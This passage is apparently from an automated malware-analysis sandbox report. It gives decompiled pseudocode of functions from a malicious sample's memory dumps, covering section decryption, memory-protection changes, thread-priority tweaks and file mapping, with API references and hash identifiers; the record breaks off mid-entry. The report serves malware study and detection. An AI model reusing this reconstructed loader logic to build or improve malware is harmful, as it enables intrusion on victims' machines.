							_t47 =  *0x6e0541cc;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x6e055137; // 0x6e055137
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E6E051D02(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x6e0541cc = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000); // executed
					}
				}
				return _v16;
			}

0x6e0515aa
0x6e0515ba
0x6e0515c1
0x6e0515c4
0x6e0515d9
0x6e0515e0
0x6e0515e5
0x6e0515f6
0x6e0515f9
0x6e051601
0x6e051604
0x6e0516ae
0x6e05160a
0x6e05160a
0x6e05160e
0x6e051676
0x6e051610
0x6e051610
0x6e051613
0x6e051615
0x6e05161d
0x6e051620
0x6e051623
0x6e05162b
0x6e051633
0x6e051634
0x6e051635
0x6e05163c
0x6e05163c
0x6e051650
0x6e051655
0x6e05165e
0x6e051665
0x6e051668
0x6e05166c
0x6e051671
0x00000000
0x00000000
0x6e051628
0x6e051628
0x6e051673
0x6e051680
0x6e051695
0x6e051682
0x6e05168b
0x6e051690
0x6e0516a6
0x6e0516a6
0x6e0516b5
0x6e0516bb

APIs

VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6E0515F9
memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6E0517EC), ref: 6E05168B
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6E0516A6

Strings

Mar 26 2021, xrefs: 6E05162B

Memory Dump Source

Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Mar 26 2021
API String ID: 4010158826-2175073649
Opcode ID: 1ac4e31586941b42839b5eef7a1995ac3f3b963105405e886860ef4bd8b82703
Instruction ID: 0eeda2cde74c3d93092f81f949df5e8edfda03726d14f05a58b26e6fa8368cfd
Opcode Fuzzy Hash: 1ac4e31586941b42839b5eef7a1995ac3f3b963105405e886860ef4bd8b82703
Instruction Fuzzy Hash: 31315E71E0060AAFDB01CFD9CA80BDEBBB9FF49304F148129D505A7345D771AA1A8B94

Uniqueness

Uniqueness Score: -1.00%

Function 00FC5988, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00FC5988(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E00FC5C4E(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x00fc5994
0x00fc5998
0x00fc5999
0x00fc599a
0x00fc599c
0x00fc599e
0x00fc59a3
0x00fc59a6
0x00fc5a3d
0x00fc5a44
0x00fc5a44
0x00fc59af
0x00fc59b6
0x00fc59c6
0x00fc59c6
0x00fc59cc
0x00fc59ce
0x00fc59d3
0x00fc59dc
0x00fc59e4
0x00fc59e7
0x00fc59f2
0x00fc59f6
0x00fc59f8
0x00fc59f9
0x00fc5a02
0x00fc5a06
0x00fc5a17
0x00fc5a08
0x00fc5a0d
0x00fc5a12
0x00fc5a21
0x00fc5a21
0x00fc59f6
0x00fc5a27
0x00fc5a2d
0x00fc5a2d
0x00fc5a36
0x00fc5a3b
0x00fc5a3b
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 00FC59B6
lstrlenW.KERNEL32(?), ref: 00FC59EC
memcpy.NTDLL(00000000,?,00000000,00000000), ref: 00FC5A0D
SysFreeString.OLEAUT32(?), ref: 00FC5A21

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: e7f7972d3c7375a127291b0860e2a6827d03bebfd28a60b65bf206032a535e69
Instruction ID: 499d0f9fbf8e37f196b5cd62a94a213777881e61f3d79dfb5819741a5ff2492a
Opcode Fuzzy Hash: e7f7972d3c7375a127291b0860e2a6827d03bebfd28a60b65bf206032a535e69
Instruction Fuzzy Hash: 1221327590060AEFCB10DFA5CA89E9EBBB8FF48714B10416DE945E7210E774EA41EF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E051D32, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E051D32(void* __ecx, intOrPtr _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6E0517A7(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x6e051d3b
0x6e051d40
0x6e051d4e
0x6e051d53
0x6e051d53
0x6e051d59
0x6e051d5e
0x6e051d62
0x6e051d66
0x6e051d66
0x6e051d70
0x6e051d79

APIs

GetCurrentThread.KERNEL32 ref: 6E051D35
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E051D40
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E051D53
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E051D66

Memory Dump Source

Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: e70e205ff66fa734b616a8f52886c601f2175cef0a42269e0416338c7111e960
Instruction ID: 8ed72daee4dbcfbcbb80ce2e7c39b85b34c1c88262de071aa2489042e8aa3d9e
Opcode Fuzzy Hash: e70e205ff66fa734b616a8f52886c601f2175cef0a42269e0416338c7111e960
Instruction Fuzzy Hash: 09E09231315B112B97022AAD4D9CFAB7B9DDF973717020335F524D22D4DB588C2A89B5

Uniqueness

Uniqueness Score: -1.00%

Function 00FC4A3C, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FC4A3C(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t55;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E00FC4380(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0xfca2d0; // 0x292d5a8
				_t4 = _t24 + 0xfcbd90; // 0x38f9338
				_t5 = _t24 + 0xfcbd38; // 0x4f0053
				_t26 = E00FC30AD( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0xfca2d0; // 0x292d5a8
						_t11 = _t32 + 0xfcbd84; // 0x38f932c
						_t48 = _t11;
						_t12 = _t32 + 0xfcbd38; // 0x4f0053
						_t55 = E00FC4DC8(_t11, _t12, _t11);
						_t59 = _t55;
						if(_t55 != 0) {
							_t35 =  *0xfca2d0; // 0x292d5a8
							_t13 = _t35 + 0xfcbdce; // 0x30314549
							if(E00FC5EC8(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) {
								_t61 =  *0xfca2b4 - 6;
								if( *0xfca2b4 <= 6) {
									_t42 =  *0xfca2d0; // 0x292d5a8
									_t15 = _t42 + 0xfcbbda; // 0x52384549
									E00FC5EC8(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
								}
							}
							_t38 =  *0xfca2d0; // 0x292d5a8
							_t17 = _t38 + 0xfcbdc8; // 0x38f9370
							_t18 = _t38 + 0xfcbda0; // 0x680043
							_t45 = E00FC33B7(_v8, 0x80000001, _t55, _t18, _t17);
							HeapFree( *0xfca290, 0, _t55);
						}
					}
					HeapFree( *0xfca290, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E00FC3EFA(_t54);
				}
				return _t45;
			}

0x00fc4a3c
0x00fc4a4c
0x00fc4a4f
0x00fc4a56
0x00fc4a58
0x00fc4a58
0x00fc4a5b
0x00fc4a60
0x00fc4a67
0x00fc4a74
0x00fc4a79
0x00fc4a7d
0x00fc4a8b
0x00fc4a99
0x00fc4a9d
0x00fc4b2e
0x00fc4b2e
0x00fc4aa3
0x00fc4aa3
0x00fc4aa8
0x00fc4aa8
0x00fc4aaf
0x00fc4abb
0x00fc4abd
0x00fc4abf
0x00fc4ac1
0x00fc4ac8
0x00fc4ada
0x00fc4adc
0x00fc4ae3
0x00fc4ae5
0x00fc4aec
0x00fc4af7
0x00fc4af7
0x00fc4ae3
0x00fc4afc
0x00fc4b01
0x00fc4b08
0x00fc4b26
0x00fc4b28
0x00fc4b28
0x00fc4abf
0x00fc4b3a
0x00fc4b3a
0x00fc4b3c
0x00fc4b41
0x00fc4b43
0x00fc4b43
0x00fc4b4e

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,038F9338,00000000,?,73BCF710,00000000,73BCF730), ref: 00FC4A8B
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,038F9370,?,00000000,30314549,00000014,004F0053,038F932C), ref: 00FC4B28
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00FC1BD5), ref: 00FC4B3A

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: b6cb33db43e5232285b1a6e96780e5d75a92c2881c69b688bcf28b35109bfacc
Instruction ID: 4eaaf7177b7f8363ad5021a259680a6c146b10c01f92307a39a2625b354d15b0
Opcode Fuzzy Hash: b6cb33db43e5232285b1a6e96780e5d75a92c2881c69b688bcf28b35109bfacc
Instruction Fuzzy Hash: 38318C3290011EBEDB119BA4DE87FAABBB8EF85714F190099F505A7021D771BE04FB60

Uniqueness

Uniqueness Score: -1.00%

Function 00FC243C, Relevance: 4.6, APIs: 3, Instructions: 82
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00FC243C(intOrPtr* __eax, void* __ecx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				long _t29;
				intOrPtr _t33;
				intOrPtr* _t41;
				void* _t42;
				void* _t46;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr _t50;

				_t42 = __ecx;
				_t41 = _a16;
				_t47 = __eax;
				_t22 =  *0xfca2d0; // 0x292d5a8
				_t2 = _t22 + 0xfcb671; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t41);
				if( *0xfca2a4 >= 5) {
					_push( &_a16);
					_push( &_v8);
					_push( &_v48);
					_t29 = _a4;
					"QQSUVWh"();
					L5:
					_a4 = _t29;
					L6:
					if(_a4 != 0) {
						L9:
						 *0xfca2a4 =  *0xfca2a4 + 1;
						L10:
						return _a4;
					}
					_t49 = _a16;
					 *_t47 = _a16;
					_t48 = _v8;
					 *_t41 = E00FC3F12(_t49, _t48);
					_t33 = E00FC45E6(_t46, _t48, _t49);
					if(_t33 != 0) {
						 *_a8 = _t48;
						 *_a12 = _t33;
						if( *0xfca2a4 < 5) {
							 *0xfca2a4 =  *0xfca2a4 & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E00FC2813();
					HeapFree( *0xfca290, 0, _t48);
					goto L9;
				}
				_t50 =  *0xfca390; // 0x38f8d6c
				if(RtlAllocateHeap( *0xfca290, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t29 = E00FC6DB7(_a4, _t42, _t46, _t50,  &_v48,  &_v8,  &_a16, _t36); // executed
				goto L5;
			}

0x00fc243c
0x00fc2443
0x00fc244a
0x00fc244e
0x00fc2453
0x00fc245e
0x00fc246e
0x00fc24b1
0x00fc24b5
0x00fc24b9
0x00fc24ba
0x00fc24bd
0x00fc24c2
0x00fc24c2
0x00fc24c5
0x00fc24c9
0x00fc2503
0x00fc2503
0x00fc2509
0x00fc2510
0x00fc2510
0x00fc24cb
0x00fc24ce
0x00fc24d0
0x00fc24dd
0x00fc24df
0x00fc24e6
0x00fc251d
0x00fc2522
0x00fc2524
0x00fc2526
0x00fc2526
0x00000000
0x00fc2524
0x00fc24e8
0x00fc24ef
0x00fc24fd
0x00000000
0x00fc24fd
0x00fc2470
0x00fc248b
0x00fc24a5
0x00000000
0x00fc24a5
0x00fc249e
0x00000000

APIs

wsprintfA.USER32 ref: 00FC245E
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00FC2483

Part of subcall function 00FC6DB7: GetTickCount.KERNEL32 ref: 00FC6DCE
Part of subcall function 00FC6DB7: wsprintfA.USER32 ref: 00FC6E1B
Part of subcall function 00FC6DB7: wsprintfA.USER32 ref: 00FC6E38
Part of subcall function 00FC6DB7: wsprintfA.USER32 ref: 00FC6E58
Part of subcall function 00FC6DB7: wsprintfA.USER32 ref: 00FC6E76
Part of subcall function 00FC6DB7: wsprintfA.USER32 ref: 00FC6E99
Part of subcall function 00FC6DB7: wsprintfA.USER32 ref: 00FC6EBA

HeapFree.KERNEL32(00000000,00FC1C1F,?,?,00FC1C1F,?), ref: 00FC24FD

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: wsprintf$Heap$AllocateCountFreeTick
String ID:
API String ID: 2794511967-0
Opcode ID: baf4c00b31572b8102f95c34e703369d425d0a633f3094bb173b065302adb679
Instruction ID: 9948f50128aec9bc015f319f865d2669eff717bb878a3c3df2744cd170289752
Opcode Fuzzy Hash: baf4c00b31572b8102f95c34e703369d425d0a633f3094bb173b065302adb679
Instruction Fuzzy Hash: 4131387250011EEFCB01DF64DE86FDA3BB8FB48314F14402AF905A7251D775A904EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E051030, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E051030(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x6e0541cc;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x63699bbf;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x63699bc1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x63699ba3;
					} else {
						_t54 = _t57 - 0x63699b83;
					}
					goto L9;
				}
				goto L12;
			}

0x6e05103a
0x6e051047
0x6e05104d
0x6e051059
0x6e051069
0x6e05106b
0x6e051073
0x6e051108
0x6e05110f
0x00000000
0x00000000
0x00000000
0x6e051079
0x6e051079
0x6e051079
0x6e05107d
0x00000000
0x00000000
0x6e051089
0x6e05108d
0x6e0510b1
0x6e0510b5
0x6e0510c9
0x6e0510c9
0x6e0510cf
0x6e0510de
0x6e0510e2
0x6e0510ea
0x6e0510ea
0x6e0510f2
0x6e0510f5
0x6e051102
0x00000000
0x00000000
0x00000000
0x00000000
0x6e051102
0x6e0510bd
0x6e0510c1
0x6e0510c7
0x00000000
0x00000000
0x00000000
0x6e0510c7
0x6e051095
0x6e051099
0x6e0510a3
0x6e05109b
0x6e05109b
0x6e05109b
0x00000000
0x6e051099
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 6E051069
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E0510DE
GetLastError.KERNEL32 ref: 6E0510E4

Memory Dump Source

Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 83c3d807fe629c1c15d1bfb45eb02c0423856c4f73e3ef7bbce32ae00f3e88f4
Instruction ID: 5b767498cca2c9a758986dbc7570da5707bcf5d542afa3c0b51a439388255033
Opcode Fuzzy Hash: 83c3d807fe629c1c15d1bfb45eb02c0423856c4f73e3ef7bbce32ae00f3e88f4
Instruction Fuzzy Hash: 4E217131800706EFCB14CFD5C985AAAF7F5FF08359F008959D00697645E3B8AAA9CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E0516EC, Relevance: 4.6, APIs: 3, Instructions: 60
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E6E0516EC() {
				char _v28;
				void _v44;
				char _v48;
				void* _v52;
				long _t23;
				int _t24;
				void* _t28;
				intOrPtr* _t30;
				signed int _t34;
				intOrPtr _t36;

				_push(0);
				_push(0x6e0541c4);
				_push(1);
				_push( *0x6e0541d0 + 0x6e055089);
				 *0x6e0541c0 = 0xc;
				 *0x6e0541c8 = 0; // executed
				L6E0514D8(); // executed
				_t34 = 6;
				memset( &_v44, 0, _t34 << 2);
				if(E6E051112( &_v44,  &_v28,  *0x6e0541cc ^ 0xfd7cd1cf) == 0) {
					_t23 = 0xb;
					L7:
					ExitThread(_t23);
				}
				_t24 = lstrlenW( *0x6e0541b8);
				_t7 = _t24 + 2; // 0x2
				_t10 = _t24 + _t7 + 8; // 0xa
				_t28 = E6E051979(_t36, _t10,  &_v48,  &_v52); // executed
				if(_t28 == 0) {
					_t30 = _v52;
					 *_t30 = 0;
					if( *0x6e0541b8 == 0) {
						 *((short*)(_t30 + 4)) = 0;
					} else {
						E6E052112(_t40, _t30 + 4);
					}
				}
				_t23 = E6E051236(_v44); // executed
				goto L7;
			}

0x6e0516fe
0x6e0516ff
0x6e051704
0x6e05170c
0x6e05170d
0x6e051717
0x6e05171d
0x6e051726
0x6e05172b
0x6e051749
0x6e05179e
0x6e05179f
0x6e0517a0
0x6e0517a0
0x6e051751
0x6e051757
0x6e051765
0x6e051769
0x6e051770
0x6e051778
0x6e05177c
0x6e05177e
0x6e05178d
0x6e051780
0x6e051786
0x6e051786
0x6e05177e
0x6e051795
0x00000000

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,6E0541C4,00000000), ref: 6E05171D
lstrlenW.KERNEL32(?,?,?), ref: 6E051751

Part of subcall function 6E051979: GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6E05176E,0000000A,?,?), ref: 6E051986
Part of subcall function 6E051979: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E05199C
Part of subcall function 6E051979: _snwprintf.NTDLL ref: 6E0519C1
Part of subcall function 6E051979: CreateFileMappingW.KERNELBASE(000000FF,6E0541C0,00000004,00000000,?,?), ref: 6E0519E6
Part of subcall function 6E051979: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E05176E,0000000A,?), ref: 6E0519FD
Part of subcall function 6E051979: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E05176E,0000000A), ref: 6E051A32

ExitThread.KERNEL32 ref: 6E0517A0

Memory Dump Source

Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
String ID:
API String ID: 4209869662-0
Opcode ID: 3b28d90efe12d0de8af38b6498b5b62f89aa5b17bc2361e85a2ac3a7e2322795
Instruction ID: c01210947d0740676197c76e87fd54ee9d7d1d970e1d7454f3677e6546de2df0
Opcode Fuzzy Hash: 3b28d90efe12d0de8af38b6498b5b62f89aa5b17bc2361e85a2ac3a7e2322795
Instruction Fuzzy Hash: 98118B72104B06AFDB00DFA8CA88EDB7BFCEB55754F00091AF115D7240DB30E9298B95

Uniqueness

Uniqueness Score: -1.00%

Function 00FC274E, Relevance: 4.6, APIs: 3, Instructions: 57
memoryCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E00FC274E(void* __ecx, signed char* _a4) {
				signed int _v8;
				void* _v12;
				void* _t13;
				signed short _t16;
				signed int _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t22;
				void* _t23;
				signed short* _t26;
				void* _t27;
				intOrPtr* _t28;
				void* _t30;
				intOrPtr* _t31;

				_t31 = __imp__;
				_t23 = 0;
				_v8 = 1;
				_t28 = 0xfca380;
				 *_t31(0, _t27, _t30, _t22, __ecx, __ecx);
				while(1) {
					_t13 = E00FC4E9C(_a4,  &_v12); // executed
					if(_t13 == 0) {
						break;
					}
					_push(_v12);
					_t19 = 0xd;
					_t20 = E00FC33FA(_t19);
					if(_t20 == 0) {
						HeapFree( *0xfca290, 0, _v12);
						break;
					} else {
						 *_t28 = _t20;
						_t28 = _t28 + 4;
						_t23 = _t23 + 1;
						if(_t23 < 3) {
							continue;
						} else {
						}
					}
					L7:
					 *_t31(1);
					if(_v8 != 0) {
						_t26 =  *0xfca388; // 0x38f9c50
						_t16 =  *_t26 & 0x0000ffff;
						if(_t16 < 0x61 || _t16 > 0x7a) {
							_t17 = _t16 & 0x0000ffff;
						} else {
							_t17 = (_t16 & 0x0000ffff) - 0x20;
						}
						 *_t26 = _t17;
					}
					return _v8;
				}
				_v8 = _v8 & 0x00000000;
				goto L7;
			}

0x00fc2755
0x00fc275c
0x00fc275f
0x00fc2766
0x00fc276b
0x00fc276d
0x00fc2774
0x00fc277b
0x00000000
0x00000000
0x00fc277d
0x00fc2782
0x00fc2783
0x00fc278a
0x00fc27a4
0x00000000
0x00fc278c
0x00fc278c
0x00fc278e
0x00fc2791
0x00fc2795
0x00000000
0x00000000
0x00fc2797
0x00fc2795
0x00fc27ae
0x00fc27b0
0x00fc27b6
0x00fc27b8
0x00fc27be
0x00fc27c5
0x00fc27d5
0x00fc27cd
0x00fc27d0
0x00fc27d0
0x00fc27d8
0x00fc27d8
0x00fc27e2
0x00fc27e2
0x00fc27aa
0x00000000

APIs

Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00FC276B

Part of subcall function 00FC4E9C: RtlAllocateHeap.NTDLL(00000000,63699BC3,00FCA380), ref: 00FC4EC7
Part of subcall function 00FC4E9C: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00FC4EE9
Part of subcall function 00FC4E9C: memset.NTDLL ref: 00FC4F03
Part of subcall function 00FC4E9C: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00FC4F41
Part of subcall function 00FC4E9C: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00FC4F55
Part of subcall function 00FC4E9C: CloseHandle.KERNEL32(?), ref: 00FC4F6C
Part of subcall function 00FC4E9C: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00FC4F78
Part of subcall function 00FC4E9C: lstrcat.KERNEL32(?,642E2A5C), ref: 00FC4FB9
Part of subcall function 00FC4E9C: FindFirstFileA.KERNELBASE(?,?), ref: 00FC4FCF

Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00FC27B0

Part of subcall function 00FC33FA: lstrlen.KERNEL32(?,00FCA380,73BB7FC0,00000000,00FC2788,?,?,?,?,?,00FC3EAC,?), ref: 00FC3403
Part of subcall function 00FC33FA: mbstowcs.NTDLL ref: 00FC342A
Part of subcall function 00FC33FA: memset.NTDLL ref: 00FC343C

HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00FC3EAC,?), ref: 00FC27A4

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: Wow64$FileHeap$AllocateEnableRedirectionmemset$CloseCreateFindFirstFreeHandleTimelstrcatlstrlenmbstowcs
String ID:
API String ID: 94831996-0
Opcode ID: 1645d101e2799a5d200b23cb4763175075e27da09864bda7bef4f60018523c05
Instruction ID: 1822dfad9736d09cb2a392b64aa02b4d199d625ec8f01af1a9d33161b9b6501b
